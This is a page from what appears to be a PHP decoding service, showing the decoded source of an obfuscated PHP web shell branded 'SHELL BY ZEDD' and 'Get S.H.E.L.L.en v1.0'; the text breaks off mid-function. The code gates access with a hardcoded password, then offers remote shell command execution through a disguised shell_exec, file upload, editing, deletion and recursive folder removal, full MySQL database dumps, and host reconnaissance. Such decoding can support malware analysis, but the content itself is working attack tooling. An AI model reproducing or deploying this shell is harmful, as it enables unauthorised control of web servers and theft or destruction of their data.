Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto KsmzR; HawB1: ?> ")}function skl_bas(){sehife("?ne=skl&emr="+b64EncodeUnicode(docu..

Decoded Output download

<?   
goto KsmzR; HawB1: ?> 
")}function skl_bas(){sehife("?ne=skl&emr="+b64EncodeUnicode(document.getElementById("skl_emr").value))}function b64EncodeUnicode(e){return btoa(encodeURIComponent(e).replace(/%([0-9A-F]{2})/g,function(e,n){return String.fromCharCode("0x"+n)}))}function goto(){var e=prompt("Dir:");e&&sehife("?qovluq="+e)}function ziple(e){var n=prompt("Dir:","<?php  goto smBkZ; chF3P: ?> 
')">Icra edin</a><br><a href="javascript:sehife('?ne=skl');">SQL</a><br><form method="POST"enctype="multipart/form-data"><input value="fayl_upl"name="ne"type="hidden"> <input value="<?php  goto tYYXW; thipm: ?> 
"name="qovluq"type="hidden"> <input name="ufayl"type="file"> <input value="Upl"type="submit"></form><form method="POST"id="post_form"style="display:none"></form><script>function sehife(e){var n="";if(void 0!==(e=e.split("?"))[1]){for(var t in e=e[1].split("&")){var i=e[t].split("=");void 0!==i[1]&&(n+="<input name='"+i[0]+"' value='"+i[1]+"' type='hidden'>")}document.all("post_form").innerHTML=n,document.all("post_form").submit()}}function faylSil(e){confirm("Eminsen atash?")&&sehife(e)}function faylSifirla(e){confirm("Eminsen atash?")&&sehife(e)}function changeFileName(e,n){var t=prompt("Change file name:",e);t&&sehife(n+"&new_name="+t)}function newFile(){var e=prompt("File name:");e&&sehife("?ne=fayl_yarat&ad="+e+"&qovluq=<?php  goto qBR_a; xggtV: ?> 
")}function sistemKom(){var e=document.getElementById("emr_et_atash").value;e&&sehife("?ne=sistem_kom&kom="+b64EncodeUnicode(e)+"&qovluq=<?php  goto yX2dP; tYYXW: echo urlencode(shifrele($default_dir)); goto thipm; FHhBZ: ?> 
");n&&sehife("?ne=ziple&qovluq=<?php  goto ZgcDO; Cd3Vj: print "<span class='qalin'>Safe mode: </span>" . ($safeMode === true ? "<span class='bad'>On" : "<span class='success'>Off") . "</span><span style='margin-left: 50px;'><a href='javascript:sehife("?ne=phpinfo")'>[ PHPinfo ]</a></span><br/>"; goto KyG1c; j9qMq: $ne = isset($_POST["ne"]) && in_array($_POST["ne"], $actions) ? $_POST["ne"] : "esas"; goto ZgBz1; fh9Qj: $actions = array("esas", "fayl_oxu", "phpinfo", "sistem_kom", "fayl_redakte", "fayl_yukle", "fayl_sil", "fayl_yarat", "papka_yarat", "fayl_sifirla", "papka_sil", "fayl_ad_deyish", "ziple", "skl", "skl_d_t", "skl_d", "fayl_upl"); goto j9qMq; DlKEc: ?> 
")}function newPapka(){var e=prompt("File name:");e&&sehife("?ne=papka_yarat&ad="+e+"&qovluq=<?php  goto yneir; Pezo2: $default_dir = getcwd(); goto zZMdU; ZgBz1: function shifrele($str) { $f = "bas"; $f .= "e6"; $f .= "4_"; $f .= "e"; $f .= "nc"; $f .= "ode"; return $f($str); } goto Nog08; J2W1x: function utf8ize($d) { if (is_array($d)) { foreach ($d as $k => $v) { $d[$k] = utf8ize($v); } } else { if (is_string($d)) { return utf8_encode($d); } } return $d; } goto o0obI; smBkZ: echo htmlspecialchars($default_dir); goto FHhBZ; U5wxj: if (isset($_GET["ne"]) && $_GET["ne"] == "pinf") { ob_start(); phpinfo(); $pInf = ob_get_clean(); print str_replace("body {background-color: #ffffff; color: #000000;}", '', $pInf); die; } else { if ($ne == "fayl_yukle" && isset($_POST["fayl"]) && '' != trim($_POST["fayl"])) { $faylAdi = basename(deshifrele(urldecode($_POST["fayl"]))); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($faylAdi, 0, 1) != "/" ? "/" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { header("Content-Disposition: attachment; filename=" . basename($faylAdi)); header("Content-Type: application/octet-stream"); header("Content-Length: " . filesize($default_dir . $ayirici . $faylAdi)); readfile($default_dir . $ayirici . $faylAdi); die; } } else { if ($ne == "fayl_sil" && isset($_POST["fayl"]) && '' != trim($_POST["fayl"])) { $faylAdi = basename(deshifrele(urldecode($_POST["fayl"]))); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($faylAdi, 0, 1) != "/" ? "/" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { unlink($default_dir . $ayirici . $faylAdi); } } else { if ($ne == "fayl_sifirla" && isset($_POST["fayl"]) && '' != trim($_POST["fayl"])) { $faylAdi = basename(deshifrele(urldecode($_POST["fayl"]))); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($faylAdi, 0, 1) != "/" ? "/" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { file_put_contents($default_dir . $ayirici . $faylAdi, ''); } } else { if ($ne == "fayl_yarat" && isset($_POST["ad"]) && !empty($_POST["ad"])) { $faylAdi = basename(urldecode($_POST["ad"])); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($faylAdi, 0, 1) != "/" ? "/" : ''; if (is_file($default_dir . $ayirici . $faylAdi)) { print "<script>alert("Bu adda fayl artiq movcuddur!");</script>"; } else { file_put_contents($default_dir . $ayirici . $faylAdi, ''); } } else { if ($ne == "papka_yarat" && isset($_POST["ad"]) && !empty($_POST["ad"])) { $papkaAdi = basename(urldecode($_POST["ad"])); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($papkaAdi, 0, 1) != "/" ? "/" : ''; if (is_file($default_dir . $ayirici . $papkaAdi)) { print "<script>alert("Bu adda papka artiq movcuddur!");</script>"; } else { mkdir($default_dir . $ayirici . $papkaAdi); } } else { if ($ne == "fayl_ad_deyish" && isset($_POST["fayl"]) && '' != trim($_POST["fayl"]) && isset($_POST["new_name"]) && is_string($_POST["new_name"]) && !empty($_POST["new_name"])) { $faylAdi = basename(deshifrele(urldecode($_POST["fayl"]))); $faylYeniAd = basename(urldecode($_POST["new_name"])); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($faylAdi, 0, 1) != "/" ? "/" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { rename($default_dir . $ayirici . $faylAdi, $default_dir . $ayirici . $faylYeniAd); } } else { if ($ne == "skl_d_t" && isset($_POST["t"]) && is_string($_POST["t"]) && !empty($_POST["t"])) { $tableName = deshifrele(urldecode($_POST["t"])); $host = isset($_COOKIE["host"]) ? $_COOKIE["host"] : ''; $user = isset($_COOKIE["user"]) ? $_COOKIE["user"] : ''; $parol = isset($_COOKIE["parol"]) ? $_COOKIE["parol"] : ''; $baza = isset($_COOKIE["baza"]) ? $_COOKIE["baza"] : ''; $bazaStr = empty($baza) ? '' : "dbname=" . $baza . ";"; if (!empty($host) && !empty($baza)) { try { $pdo = new PDO("mysql:host=" . $host . ";charset=utf8;" . $bazaStr, $user, $parol, array(PDO::MYSQL_ATTR_INIT_COMMAND => "SET NAMES 'utf8'")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $getColumns = $pdo->prepare("SELECT column_name from information_schema.columns where table_schema=? and table_name=?"); $getColumns->execute(array($baza, $tableName)); $columns = $getColumns->fetchAll(); if ($columns) { $data = $pdo->query("SELECT * FROM `" . $tableName . "`"); $data = $data->fetchAll(); header("Content-disposition: attachment; filename=d_" . basename(htmlspecialchars($tableName)) . ".json"); header("Content-type: application/json"); echo json_encode($data); } else { print "Table not found!"; } } catch (Exception $e) { print $e->getMessage(); } } else { print "Error! Please connect to SQL!"; } die; } else { if ($ne == "skl_d") { $host = isset($_COOKIE["host"]) ? $_COOKIE["host"] : ''; $user = isset($_COOKIE["user"]) ? $_COOKIE["user"] : ''; $parol = isset($_COOKIE["parol"]) ? $_COOKIE["parol"] : ''; $baza = isset($_COOKIE["baza"]) ? $_COOKIE["baza"] : ''; $bazaStr = empty($baza) ? '' : "dbname=" . $baza . ";"; if (!empty($host) && !empty($baza)) { try { $pdo = new PDO("mysql:host=" . $host . ";charset=utf8;" . $bazaStr, $user, $parol, array(PDO::MYSQL_ATTR_INIT_COMMAND => "SET NAMES 'utf8'")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $allData = array(); $tables = $pdo->prepare("SELECT table_name from information_schema.tables where table_schema=?"); $tables->execute(array($baza)); $tables = $tables->fetchAll(); foreach ($tables as $tableName) { $tableName = $tableName["table_name"]; $data = $pdo->query("SELECT * FROM `" . $tableName . "`"); $data = $data->fetchAll(); $allData[$tableName] = $data ? array($data) : array(); } header("Content-disposition: attachment; filename=d_b_" . basename(htmlspecialchars($baza)) . ".json"); header("Content-type: application/json"); echo json_encode(utf8ize($allData)); } catch (Exception $e) { print $e->getMessage(); } } else { print "Error! Please connect to SQL!"; } die; } else { if ($ne == "ziple" && isset($_POST["save_to"], $_POST["zf"]) && is_string($_POST["save_to"]) && !empty($_POST["save_to"]) && !in_array($_POST["save_to"], array(".", "..", "./", "../")) && is_string($_POST["zf"]) && !empty($_POST["zf"])) { $save_to = deshifrele(urldecode($_POST["save_to"])); $rootPath = realpath(deshifrele(urldecode($_POST["zf"]))); $fileName1 = "bak_" . microtime(1) . "_" . rand(1000, 99999) . ".zip"; $fileName = $save_to . DIRECTORY_SEPARATOR . $fileName1; if (is_dir($save_to) && is_dir($rootPath) && is_writable($save_to)) { set_time_limit(0); $zip = new ZipArchive(); $zip->open($fileName, ZipArchive::CREATE | ZipArchive::OVERWRITE); $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($rootPath), RecursiveIteratorIterator::LEAVES_ONLY); foreach ($files as $name => $file) { if (!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($rootPath) + 1); $zip->addFile($filePath, $relativePath); } } $zip->close(); print "Saved!<hr>"; } else { print "Dir is not writeable!<hr>"; var_dump($save_to); } } else { if ($ne == "papka_sil" && isset($_POST["zf"]) && is_string($_POST["zf"]) && !empty($_POST["zf"])) { $rootPath = realpath(deshifrele(urldecode($_POST["zf"]))); if (is_dir($rootPath)) { set_time_limit(0); rrmdir($rootPath); } else { print "Dir is not writeable!<hr>"; var_dump($save_to); } } else { if ($ne == "fayl_upl" && isset($_FILES["ufayl"])) { move_uploaded_file($_FILES["ufayl"]["tmp_name"], $default_dir . "/" . $_FILES["ufayl"]["name"]); print "Upload oldu deyesen."; } } } } } } } } } } } } goto ygUGz; yneir: echo urlencode(urlencode(shifrele($default_dir))); goto xggtV; yX2dP: echo urlencode(urlencode(shifrele($default_dir))); goto HawB1; MqqoL: ?> 
&zf="+e+"&save_to="+b64EncodeUnicode(n))}function silPapka(e){confirm("Eminsen atash?")&&sehife("?ne=papka_sil&qovluq=<?php  goto fbJbF; ORf1s: $password = "511402"; goto Xzy7l; Nog08: function deshifrele($str) { $f = "bas"; $f .= "e6"; $f .= "4_"; $f .= "d"; $f .= "ec"; $f .= "ode"; return $f($str); } goto mbDQb; RFMY1: if (function_exists("posix_getegid")) { $qid = posix_getgrgid(posix_getegid()); $qrup = $qid["name"]; print "<span class='qalin'>Uname:</span> " . php_uname() . "<br/>"; print "<span class='qalin'>User:</span> " . getmyuid() . " (" . get_current_user() . ")<br/>"; print "<span class='qalin'>Group:</span> " . getmygid() . " (" . $qrup . ")<br/>"; } else { print "<span class='qalin'>Uname:</span> " . php_uname() . "<br/>"; print "<span class='qalin'>User:</span> " . getmyuid() . " (" . get_current_user() . ")<br/>"; print "<span class='qalin'>Group:</span> " . getmygid() . "<br/>"; } goto D47te; h6gu1: if ($ne == "phpinfo") { print "<div style='width: 100%; height: 400px;'><iframe src='?ne=pinf' style='width: 100%; height: 400px; border: 0;'></iframe></div>"; } else { if ($ne == "sistem_kom") { if (isset($_POST["kom"]) && is_string($_POST["kom"]) && !empty($_POST["kom"])) { $komanda = deshifrele(urldecode($_POST["kom"])); $k = "sh"; $k .= "el"; $k .= "l_e"; $k .= "xe"; $k .= "c"; $output = $k($komanda); print "<pre style="max-height: 350px;overflow: auto; border: 1px solid #777; padding: 5px;">" . htmlspecialchars($output) . "</pre><hr>"; } print "<input type="text" id="emr_et_atash" style="width: 500px;"> <button type="button" class="btn" onclick="sistemKom();">Bas</button>"; } else { if ($ne == "fayl_oxu" && isset($_POST["fayl"]) && '' != trim($_POST["fayl"])) { $faylAdi = basename(deshifrele(urldecode($_POST["fayl"]))); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($faylAdi, 0, 1) != "/" ? "/" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { $elaveBtn = is_writeable($default_dir . $ayirici . $faylAdi) ? " onclick='sehife("?ne=fayl_redakte&fayl=" . urlencode(urlencode(shifrele($faylAdi))) . "&qovluq=" . urlencode(urlencode(shifrele($default_dir))) . "")'" : " disabled"; print "<div>Fayl ad&#305;: <span class='qalin'>" . htmlspecialchars($faylAdi) . "</span><br/><button class='btn'{$elaveBtn}> D&#601;yi&#351; </button></div>"; print "<div class='fayl_oxu'>" . highlight_string(file_get_contents($default_dir . $ayirici . $faylAdi), true) . "</div>"; } } else { if ($ne == "skl") { $host = isset($_COOKIE["host"]) ? $_COOKIE["host"] : ''; $user = isset($_COOKIE["user"]) ? $_COOKIE["user"] : ''; $parol = isset($_COOKIE["parol"]) ? $_COOKIE["parol"] : ''; $baza = isset($_COOKIE["baza"]) ? $_COOKIE["baza"] : ''; if (isset($_POST["host"], $_POST["user"], $_POST["parol"]) && is_string($_POST["host"]) && is_string($_POST["user"]) && is_string($_POST["parol"])) { $host = $_POST["host"]; $user = $_POST["user"]; $parol = $_POST["parol"]; $baza = ''; setcookie("host", $host, time() + 360000); setcookie("user", $user, time() + 360000); setcookie("parol", $parol, time() + 360000); setcookie("baza", $baza, time() + 360000); } if (isset($_POST["baza"]) && is_string($_POST["baza"])) { $baza = $_POST["baza"]; setcookie("baza", $baza, time() + 360000); } $bazaStr = empty($baza) ? '' : "dbname=" . $baza . ";"; ?> 
<form method="POST"><input value="skl"name="ne"type="hidden"> <input value="<?php  echo htmlspecialchars($host); ?> 
"name="host"placeholder="Hostname"> <input value="<?php  echo htmlspecialchars($user); ?> 
"name="user"placeholder="User"> <input value="<?php  echo htmlspecialchars($parol); ?> 
"name="parol"placeholder="Parol"> <input value="Daxil ol"type="submit"></form><?php  if (!empty($host)) { try { $pdo = new PDO("mysql:host=" . $host . ";charset=utf8;" . $bazaStr, $user, $parol, array(PDO::MYSQL_ATTR_INIT_COMMAND => "SET NAMES 'utf8'")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $schematas = $pdo->query("SELECT schema_name FROM information_schema.schemata"); print "<form method="POST"><input type="hidden" name="ne" value="skl"><select name="baza">"; foreach ($schematas->fetchAll() as $schemaName) { print "<option" . ($baza == $schemaName["schema_name"] ? " selected" : '') . ">" . htmlspecialchars($schemaName["schema_name"]) . "</option>"; } print "</select> <input type="submit" value="Sech!"></form>"; if (!empty($baza)) { $tables = $pdo->prepare("SELECT table_name from information_schema.tables where table_schema=?"); $tables->execute(array($baza)); $tables = $tables->fetchAll(); print "<div style="float: left; width: 20%; overflow: auto; border-right: 1px solid #999;">"; print "<a href="javascript:sehife('?ne=skl_d');">!! Dump DB !!</a><hr>"; foreach ($tables as $tableName) { $tableName = $tableName["table_name"]; print "<a href="javascript:sehife('?ne=skl&t=" . urlencode(urlencode(shifrele($tableName))) . "')">" . htmlspecialchars($tableName) . "</a><br>"; } print "</div>"; print "<div style="float: left; padding-left: 10px; width: 75%;">"; if (isset($_POST["t"]) && is_string($_POST["t"]) && !empty($_POST["t"])) { $tableName = deshifrele(urldecode($_POST["t"])); print "<span class="qalin">Table:</span> " . htmlspecialchars($tableName) . " ( <a href="javascript:sehife('?ne=skl_d_t&t=" . urlencode(urlencode(shifrele($tableName))) . "')">Dump</a> )<br>"; $getColumns = $pdo->prepare("SELECT column_name from information_schema.columns where table_schema=? and table_name=?"); $getColumns->execute(array($baza, $tableName)); $columns = $getColumns->fetchAll(); if ($columns) { $dataCount = $pdo->query("SELECT count(0) AS ss from `" . $tableName . "`"); $dataCount = (int) $dataCount->fetchColumn(); print "<span class="qalin">Count:</span> " . $dataCount . "<br><br>"; $pages = ceil($dataCount / 100); $currentPage = isset($_POST["sehife"]) && is_numeric($_POST["sehife"]) && $_POST["sehife"] >= 1 && $_POST["sehife"] <= $pages ? (int) $_POST["sehife"] : 1; for ($p = 1; $p <= $pages; $p++) { print "<a style="" . ($currentPage == $p ? "background: #444;" : '') . "margin-left: 2px; margin-bottom: 5px; padding: 2px 6px; border: 1px solid #ACB754; text-decoration: none;" href="javascript:sehife('?ne=skl&t=" . urlencode(urlencode(shifrele($tableName))) . "&sehife=" . $p . "');">" . $p . "</a> "; } print "<br><br>"; $start = 100 * ($currentPage - 1); $data = $pdo->query("SELECT * FROM `" . $tableName . "` LIMIT " . $start . " , 100"); $data = $data->fetchAll(); print "<table><thead>"; foreach ($columns as $columnInf) { print "<th>" . htmlspecialchars($columnInf["column_name"]) . "</th>"; } print "</thead><tbody>"; foreach ($data as $row) { print "<tr>"; foreach ($row as $key => $val) { print "<td><div>" . $val . "</div></td>"; } print "</tr>"; } print "</tr></tbody></table>"; } else { print "Table not found!"; } } else { if (isset($_POST["emr"]) && is_string($_POST["emr"]) && !empty($_POST["emr"])) { $emr = deshifrele(urldecode($_POST["emr"])); print "<span class="qalin">SQL emr:</span> " . htmlspecialchars($emr) . "<br>"; $data = $pdo->query($emr); $data = $data->fetchAll(); print "<table><thead>"; if (count($data) > 0) { print "<tr>"; foreach ($data[0] as $key => $val) { print "<th><div>" . $key . "</div></th>"; } print "</tr>"; } print "</thead><tbody>"; foreach ($data as $row) { print "<tr>"; foreach ($row as $key => $val) { print "<td><div>" . $val . "</div></td>"; } print "</tr>"; } print "</tr></tbody></table>"; } } print "<div><textarea id="skl_emr"></textarea><button type="button" onclick="skl_bas();">Bas mene</button></div>"; print "</div>"; print "<div style="clear: both;"></div>"; } } catch (Exception $e) { print $e->getMessage(); } } } else { if ($ne == "fayl_redakte" && isset($_POST["fayl"]) && '' != trim($_POST["fayl"])) { $faylAdi = basename(deshifrele(urldecode(urldecode($_POST["fayl"])))); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($faylAdi, 0, 1) != "/" ? "/" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { $status = ''; if (isset($_POST["content"]) && isset($_POST["took"]) && $_POST["took"] != '' && isset($_SESSION["ys_took"]) && $_SESSION["ys_took"] == $_POST["took"] && is_writeable($default_dir . $ayirici . $faylAdi)) { unset($_SESSION["ys_took"]); $content = $_POST["content"]; $cc = array("a", "i", "e", "s", "l", "b", "u", "o", "p", "h", "(", ")", "<", ">", "?", ";", "[", "]", "$"); foreach ($cc as $k1 => $v1) { $content = str_replace("|:" . $k1 . ":|", $v1, $content); } $faylAch = fopen($default_dir . $ayirici . $faylAdi, "w+"); fwrite($faylAch, $content); fclose($faylAch); $status = " <span class='qalin'>U&#287;urla yadda saxlan&#305;ld&#305;!</span>"; } $oxuUrl = "?ne=fayl_oxu&fayl=" . urlencode(urlencode(shifrele($faylAdi))) . "&qovluq=" . urlencode(urlencode(shifrele($default_dir))); $elaveBtn = is_writeable($default_dir . $ayirici . $faylAdi) ? '' : " disabled"; print "<div>Fayl ad&#305;: <a class='qalin' href='javascript:sehife("{$oxuUrl}")'>" . htmlspecialchars($faylAdi) . "</a><br/><form method='POST' style='padding: 0; margin: 0;'><button type='submit' class='btn'{$elaveBtn}> Yadda saxla </button> <button type='button' onclick='shifrelee()'> Shifrele atash </button> {$status}</div>"; print "<input type='hidden' value='fayl_redakte' name='ne'><input type='hidden' value='" . shifrele($faylAdi) . "' name='fayl'><input type='hidden' value='" . urlencode(shifrele($default_dir)) . "' name='qovluq'><input type='hidden' value='" . tookYarat("ys_took") . "' name='took'><textarea name='content' class='file_edit'>" . htmlspecialchars(file_get_contents($default_dir . $ayirici . $faylAdi)) . "</textarea></form>"; } else { print "Error! " . htmlspecialchars($default_dir . $ayirici . $faylAdi); } } else { if (is_dir($default_dir)) { if (is_readable($default_dir)) { $qovluqIchi = scandir($default_dir); foreach ($qovluqIchi as &$emelemnt) { $ayirici = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($emelemnt, 0, 1) != "/" ? "/" : ''; if (is_dir($default_dir . $ayirici . $emelemnt)) { $emelemnt = "0" . $emelemnt; } else { $emelemnt = "1" . $emelemnt; } } asort($qovluqIchi); print "<table class='fManager' style='width: 100%;'><thead><tr class='qalin'><th>s</th><th>Fayl</th><th>Size</th><th>Tarix</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr></thead><tbody>"; foreach ($qovluqIchi as $element) { $url = ''; $element = substr($element, 1); $faylAdiTam = $default_dir . $ayirici . $element; $ayirici = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($element, 0, 1) != "/" ? "/" : ''; $adi = is_dir($faylAdiTam) ? "[ {$element} ]" : $element; $classN = ''; if (is_dir($faylAdiTam)) { if ($element == ".") { $url = "?qovluq=" . urlencode(urlencode(shifrele($default_dir))); } else { if ($element == "..") { $yeniUrl = explode("/", $default_dir); foreach (array_reverse($yeniUrl) as $j => $qq) { if (trim($qq) != '') { unset($yeniUrl[count($yeniUrl) - $j - 1]); break; } } $url = "?qovluq=" . urlencode(urlencode(shifrele(implode("/", $yeniUrl)))); } else { $url = "?qovluq=" . urlencode(urlencode(shifrele($faylAdiTam))); } } $classN = " style='font-weight: 600;'"; } else { $url = "?ne=fayl_oxu&fayl=" . urlencode(urlencode(shifrele($element))) . "&qovluq=" . urlencode(urlencode(shifrele($default_dir))); } $fayldi = is_file($faylAdiTam); $isReadableColor = is_readable($faylAdiTam) && is_writeable($faylAdiTam); print "<tr>
\x9\x9\x9			<td></td>\xa			\x9	\x9<td><a href="javascript:sehife('" . $url . "')"" . $classN . ">" . htmlspecialchars($adi) . "</a></td>
			\x9\x9	<td>" . ($fayldi ? sizeFormat(filesize($faylAdiTam)) : '') . "</td>\xa\x9\x9\x9\x9		<td>" . date("d M Y, H:i", filectime($faylAdiTam)) . "</td>
\x9\x9	\x9		<td>" . htmlspecialchars(fileowner($faylAdiTam)) . "</td>
\x9					<td" . ($isReadableColor ? " style="color: green;"" : '') . ">" . substr(sprintf("%o", fileperms($faylAdiTam)), -4) . "</td>
						<td>"; if (is_file($faylAdiTam)) { print " <a href="javascript:sehife('" . str_replace("fayl_oxu", "fayl_yukle", $url) . "')"" . $classN . ">Download</a> | " . (" <a href="javascript:changeFileName('" . htmlspecialchars($adi) . "' , '" . str_replace("fayl_oxu", "fayl_ad_deyish", $url) . "');"" . $classN . ">Rename</a> | ") . (" <a href="javascript:faylSifirla('" . str_replace("fayl_oxu", "fayl_sifirla", $url) . "');"" . $classN . ">Truncate</a> | ") . (" <a href="javascript:faylSil('" . str_replace("fayl_oxu", "fayl_sil", $url) . "')"" . $classN . ">Delete</a>"); } else { if ($adi != "[ . ]" && $adi != "[ .. ]") { print " <a href="javascript:ziple('" . urlencode(urlencode(shifrele($faylAdiTam))) . "')"" . $classN . ">Zip</a> | " . (" <a href="javascript:silPapka('" . urlencode(urlencode(shifrele($faylAdiTam))) . "')"" . $classN . ">Sil</a>"); } } print "</td>\xa	\x9\x9	\x9</tr>"; } } else { print "<div style='margin: 10px 0px;' class='qalin'>Permissions denided!</div>"; } } } } } } } goto UH836; mA406: $safeMode = true; goto fh9Qj; D47te: print "<span class='qalin'>Disable functions:</span> " . (implode(", ", $baqliFunksiyalar) == '' ? "<span class='success'>yoxdu :)" : "<span class='bad'>" . implode(", ", $baqliFunksiyalar)) . "</span><br/>"; goto Cd3Vj; ygUGz: ?> 
<html><head><title>Get S.H.E.L.L.en v1.0 | BY ..</title><meta content="text/html; charset=utf-8"http-equiv="content-type"><style>body{background-color:#222;color:#d6d4d4;font-family:Lucida,Verdana;font-size:12px}.qalin{text-decoration:none;color:#d6905e;font-weight:600}.success{color:#9db754}.bad{color:#b75654}a{color:#acb754;text-decoration:none!important}.fManager,.fManager tbody,.fManager tr{padding:0;border-collapse:collapse;margin:0;font-size:12px}.fManager{margin:10px 0}.fManager tbody tr:nth-child(2n+1){background:#331717}.fManager tbody tr:nth-child(2n){background:#1c0c0c}.fManager tbody tr:hover{background:#000}.fManager thead th{text-align:left}.fManager thead tr{background-color:#333}.fManager{box-shadow:1px 1px 1px 1px #333}.fManager thead th{padding:4px 3px}.fayl_oxu{margin:5px 0;padding:2px;box-shadow:1px 1px 1px 1px #333;background-color:#e1e1e1;width:100%;height:400px;overflow:auto}.btn{border:1px solid #acae40;background-color:#223b3b;color:#e1e1e1;padding:1px 10px;cursor:pointer}.btn:disabled{border:1px solid #848484;color:#848484;cursor:not-allowed}.file_edit{margin:5px 0;padding:2px;box-shadow:1px 1px 1px 1px #333;background-color:#e1e1e1;width:100%;height:400px;overflow:auto}input,select,textarea{background:0 0!important;color:#f6a56d;border:1px solid #d6905e;padding:5px}table td{border:1px solid rgba(214,144,94,.7);min-width:20px;padding-left:5px;padding-right:5px;max-width:500px;color:#ffad6f;background:#292929}table th{border:1px solid #d6905e;padding-left:5px;padding-right:5px;color:#ffad6f}table td div{overflow:auto;width:100%;height:100%;max-height:100px}</style></head><body><?php  goto RFMY1; zZMdU: if (isset($_POST["qovluq"]) && is_string($_POST["qovluq"])) { $default_dir = empty($_POST["qovluq"]) ? DIRECTORY_SEPARATOR : deshifrele(urldecode(urldecode($_POST["qovluq"]))); $c_h_dir_comm = "c" . "hd" . "ir"; $c_h_dir_comm($default_dir); } goto DxbeC; DxbeC: $default_dir = str_replace("\", "/", $default_dir); goto U5wxj; KsmzR: session_start(); goto ORf1s; o0obI: function rrmdir($dir) { if (is_dir($dir)) { $objects = scandir($dir); foreach ($objects as $object) { if ($object != "." && $object != "..") { if (is_dir($dir . "/" . $object)) { rrmdir($dir . "/" . $object); } else { unlink($dir . "/" . $object); } } } rmdir($dir); } } goto Pezo2; rrIO4: echo urlencode(urlencode(shifrele($default_dir))); goto chF3P; XSSO7: ?> 
<hr><a href="javascript:newFile();">Yeni fayl</a> | <a href="javascript:newPapka();">Yeni papka</a><br><a href="javascript:sehife('?ne=sistem_kom&qovluq=<?php  goto rrIO4; Xzy7l: if (!isset($_SESSION["authenticated"]) || $_SESSION["authenticated"] !== true) { if (isset($_POST["password"]) && $_POST["password"] === $password) { $_SESSION["authenticated"] = true; echo "<style>\xa                @keyframes fadeIn {
                    from { opacity: 0; }\xa                    to { opacity: 1; }
                }
                \xa                h2 {\xa                    animation: fadeIn 2s linear;\xa                }\xa              </style>"; } echo "\xa    <style>\xa        body {\xa            background-image: url("https://w0.peakpx.com/wallpaper/188/745/HD-wallpaper-tomori-nao-anime-charlotte-otaku.jpg");\xa            background-size: cover;\xa            background-position: center;\xa            background-repeat: no-repeat;\xa            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh;\xa        }
        \xa        form {\xa            display: flex;
            flex-direction: column;\xa            align-items: center;
            background-color: rgba(255, 255, 255, 0.8);\xa            padding: 20px;\xa            border-radius: 10px;
        }
        \xa        h2 {\xa            animation-duration: 2s;
            animation-iteration-count: infinite;
            animation-name: glowing;\xa            color: black; /* Warna teks hitam */
        }
        
        @keyframes glowing {
            0% { color: white; text-shadow: 0 0 10px #fff; }
            50% { color: #FF0000; text-shadow: 0 0 20px #FF0000; } /* Warna teks merah */\xa            100% { color: white; text-shadow: 0 0 10px #fff; }
        }
        \xa        input[type="password"] {
            margin-bottom: 10px;
            padding: 5px;\xa            border-radius: 5px;
        }\xa        
        input[type="submit"] {
            padding: 8px 15px;
            border-radius: 5px;
            background-color: #FFFFFF; /* Warna latar belakang putih */
            color: black; /* Warna teks hitam */
            cursor: pointer;
        }\xa    </style>\xa    <audio src="https://b.top4top.io/m_258014dnw0.mp3" autoplay></audio>
    <form method="POST" action="">\xa        <h2 class="glow">SHELL BY ZEDD</h2>
        <input type="password" name="password" placeholder="Masukkan password">\xa        <input type="submit" value="Submit">
    </form>"; die; } goto VVn9w; UH836: print "</tbody></table>"; goto XSSO7; kjyBu: function sizeFormat($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . " Gb"; } else { if ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . " Mb"; } else { if ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . " Kb"; } else { $bytes = $bytes . " b"; } } } return $bytes; } goto J2W1x; qBR_a: echo urlencode(urlencode(shifrele($default_dir))); goto DlKEc; S2ToV: function qovluquYaz() { global $default_dir; $sonDir = array(); $umumiHisseler = ''; $parse = explode("/", $default_dir); $ii = 0; foreach ($parse as $hisse) { $ii++; $umumiHisseler .= $hisse . "/"; $sonDir[] = "<a href='javascript:sehife("?qovluq=" . urlencode(urlencode(shifrele($umumiHisseler))) . "")'>" . htmlspecialchars(empty($hisse) && $ii != count($parse) ? "/" : $hisse) . "</a>"; } $sonDir = implode("/", $sonDir); print $sonDir . "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;( <a href="">Reset</a> | <a href="javascript:goto()">Go to</a> )"; } goto kjyBu; KyG1c: qovluquYaz(); goto A4uIu; A4uIu: print "<hr>"; goto h6gu1; ZgcDO: echo urlencode(urlencode(shifrele($default_dir))); goto MqqoL; fbJbF: echo urlencode(urlencode(shifrele($default_dir))); goto x_mUh; mbDQb: function tookYarat($tAd) { if 